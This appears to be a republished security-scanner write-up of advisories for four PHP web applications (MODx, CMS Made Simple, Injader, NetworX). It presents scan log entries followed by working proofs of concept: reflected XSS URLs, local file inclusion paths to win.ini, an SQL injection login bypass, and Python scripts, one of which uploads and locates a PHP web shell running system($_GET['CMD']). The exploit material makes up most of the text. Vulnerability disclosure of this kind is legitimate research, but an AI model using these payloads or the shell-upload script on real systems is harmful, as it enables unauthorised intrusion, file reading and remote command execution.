All testing was performed on Windows XP and Vista using XAMPP. Each target application was installed, then a full scan was performed. Noteworthy log entries revealing exploitable faults are shown followed by the expoit proof of concepts and resulting advisories.
출처 : autosectools.com
Case Study 1: MODx Revolution 2.0.2-pl
Reflected Cross-site Scripting Log Entry
Alert Name: Reflected XSS GET /modx/manager/index.php?service=12%3cscript%3ealert(0)%3c%2fscript%3e&login_context=12%3cscript%3ealert(0)%3c%2fscript%3e&q=12%3cscript%3ealert(0)%3c%2fscript%3e&cultureKey=12%3cscript%3ealert(0)%3c%2fscript%3e&modahsh=12%3cscript%3ealert(0)%3c%2fscript%3e&installGoingOn=12%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 13:54:18 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=653ch30lgkjk9bo8b7gu13u8u4; expires=Thu, 27-Jan-2011 13:54:18 GMT; path=/modx/ Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Last-Modified: Thu, 20 Jan 2011 13:54:18 GMT Cache-Control: post-check=0, pre-check=0 Content-Length: 6946 Content-Type: text/html; charset=UTF-8 [Response Trimmed] <form id="modx-login-form" action="" method="post"> <input type="hidden" name="login_context" value="mgr" /> <input type="hidden" name="modahsh" value="12<script>alert(0)</script>" /> [Response Trimmed]
Reflected Cross-site Scripting Proof of Concept
http://localhost/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3EOriginal Advisory
Local File Inclusion Log Entry
Alert Name: Local File Inclusion POST /modx/manager/controllers/default/resource/tvs.php?class_key=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&resource=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 04:21:29 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.1 Content-Length: 11 Content-Type: text/html LFI_Test123
Local File Inclusion Proof of Concept
http://localhost/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00Original Advisory
Case Study 2: CMS Made Simple 1.8
Local File Inclusion Log Entry
Alert Name: Local File Inclusion
POST /cmsms/admin/addbookmark.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 192
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
------x
Content-Disposition: form-data; name="default_cms_lang"
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt
------x--
HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 05:00:36 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: CMSSESSID839fe7b5=uk0uvk8aja6cfajgluik3sbok3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sp_=883fc4fd
Content-Length: 322
Content-Type: text/html
LFI_Test123<script type="text/javascript">
<!--
location.replace("http://localhost/cmsms/admin/login.php");
// -->
</script>
<noscript>
<meta http-equiv="Refresh" content="0;URL=http://localhost/cmsms/admin/login.php">
</noscript>Local File Inclusion Proof of Concept
import httplib, urllib
host = 'localhost'
path = '/cmsms'
lfi = '../' * 32 + 'windows/win.ini\x00'
c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
urllib.urlencode({ 'default_cms_lang': lfi }),
{ 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()
print r.status, r.reason
print r.read()Original Advisory Case Study 3: Injader 2.4.4
SQL Injection Log Entry
Alert Name: Potential SQL Injection POST /injader/login.php?un='%3b--%22%3b--&pw='%3b--%22%3b-- HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 02:30:15 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.1 Content-Length: 794 Content-Type: text/html <br /> <b>Deprecated</b>: Function split() is deprecated in <b>C:\tools\xampp\htdocs\injader\sys\includes\ifw\IQuery.php</b> on line <b>143</b><br /> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>Database Error</title> <link rel="stylesheet" type="text/css" href="/injader/sys/loginpage.css" /> </head> <body> <div id="mPage"> <h1>Database Error</h1> <p>Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1. </p> <p>Your query was: SELECT username, id FROM maj_users WHERE username = '\'</p> <p id="err-src"><strong>Source:</strong> User::ValidateLogin; Line: 179</p> </div> </body> </html>
SQL Inection Proof of Concept
http://localhost/injader/login.php?un=\\'%20or%20id=1%20and%20'a'='a&pw=\\'%20or%20'a'='aOriginal Advisory
Case Study 4: NetworX 1.0.3
Arbitrary Upload Log Entry
Alert Name: Arbitrary File Event - Type=Changed Path=C:\tools\xampp\htdocs\networx\tmp\shell.php POST /networx/about.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream <?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?> ------x-- HTTP/1.1 200 OK Date: Sun, 23 Jan 2011 23:34:40 GMT [Trimmed]
Shell Upload Proof of Concept
import sys, socket
host = 'localhost'
path = '/networx'
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 193\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n\r\n'
'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
'------x--\r\n\r\n')
resp = s.recv(8192)
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'
shell_path = path + '/tmp/shell.php'
s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')
if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
else: print 'shell located at http://' + host + shell_path
upload_shell()Original AdvisoryReflected Cross-site Scripting Log Entry
Alert Name: Reflected XSS GET /networx/group_connections_list_popup.php?logout=181%3cscript%3ealert(0)%3c%2fscript%3e&group_id=181%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Sun, 23 Jan 2011 23:38:22 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=jl5bal27shg6e9akhu5566lqu7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2107 Content-Type: text/html [Trimmed] <input type="hidden" name="GroupID" value="181<script>alert(0)</script>" /> <input type="image" src="images/btn-send_invitations.gif" alt="Send Invitations" /> [Trimmed]
Reflected Cross-site Scripting Proof of Concept
http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3EOriginal Advisory
출처 : autosectools.com
728x90
댓글